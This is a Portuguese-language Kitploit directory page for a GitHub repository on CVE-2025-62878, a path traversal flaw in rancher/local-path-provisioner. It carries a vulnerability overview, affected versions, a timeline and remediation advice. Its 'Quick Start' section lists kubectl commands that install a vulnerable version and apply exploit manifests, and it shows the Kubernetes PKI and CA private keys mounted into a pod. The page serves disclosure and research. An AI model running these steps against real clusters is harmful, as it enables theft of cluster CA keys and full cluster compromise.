Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
Ferramentas/GitHubGitHub/kinokopio/cve-2025-62878
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoSegurança na NuvemConfiguração IncorretaAprendizado e EducaçãoLabs e Prática
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2025-62878: Travessia de Caminho (Path Traversal) no Local Path Provisioner

Visão Geral

ItemValor
CVE IDCVE-2025-62878
GHSA IDGHSA-jr3w-9vfr-c746
GravidadeCrítica (CVSS 10.0)
CWECWE-23 (Relative Path Traversal)
Componente Afetadorancher/local-path-provisioner
Versões Afetadasv0.0.27 ~ v0.0.32
Versões Corrigidasv0.0.33+

Descrição da Vulnerabilidade

Existe uma vulnerabilidade de travessia de caminho no parâmetro pathPattern de StorageClass. Um usuário malicioso pode manipular pathPattern usando elementos de caminho relativos (por exemplo, ../) para criar PersistentVolumes apontando para locais arbitrários no nó host, contornando a restrição do diretório base configurado.

Isso permite que atacantes:

  • Acessem arquivos sensíveis do host (por exemplo, /etc/kubernetes/pki/)
  • Sobrescrevam arquivos críticos do sistema
  • Alcancem comprometimento total do cluster ao roubar chaves privadas da CA do Kubernetes

Versões Afetadas (Verificadas)

Nota: O advisory oficial do GitHub afirma que "< 0.0.34" é afetado, mas nossos testes confirmam:

  • v0.0.33 já está corrigido
  • v0.0.26 e anteriores não são afetados (o recurso pathPattern não existe)
  • Faixa realmente afetada: v0.0.27 <= versão <= v0.0.32

Linha do Tempo

EventoData
Recurso pathPattern introduzido2024-05-26 (commit af85381)
Primeira versão vulnerável (v0.0.27)

Reprodução

Consulte o diretório exploit/ para etapas detalhadas de reprodução e scripts.

Início Rápido

root@kitploit:~
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys

Remediação

Atualize para v0.0.33 ou posterior:

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

Referências

  • Advisory do GitHub GHSA-jr3w-9vfr-c746
  • Commit de Correção 1ed6b54
  • Commit do Recurso pathPattern af85381
Baixar ferramenta
VersãoData de LançamentoSuporte a pathPatternVulnerável
v0.0.262023-12-03NãoSeguro (recurso não existe)
v0.0.272024-05-29SimVulnerável
v0.0.282024-06-19SimVulnerável
v0.0.292024-09-03SimVulnerável
v0.0.302024-10-07SimVulnerável
v0.0.312025-01-24SimVulnerável
v0.0.322025-07-31SimVulnerável
v0.0.332025-12-25SimCorrigido
v0.0.342026-01-06SimCorrigido
2024-05-29
Commit de correção2025-12-24 (commit 1ed6b54)
Primeira versão corrigida (v0.0.33)2025-12-25
CVE publicado2026-02-04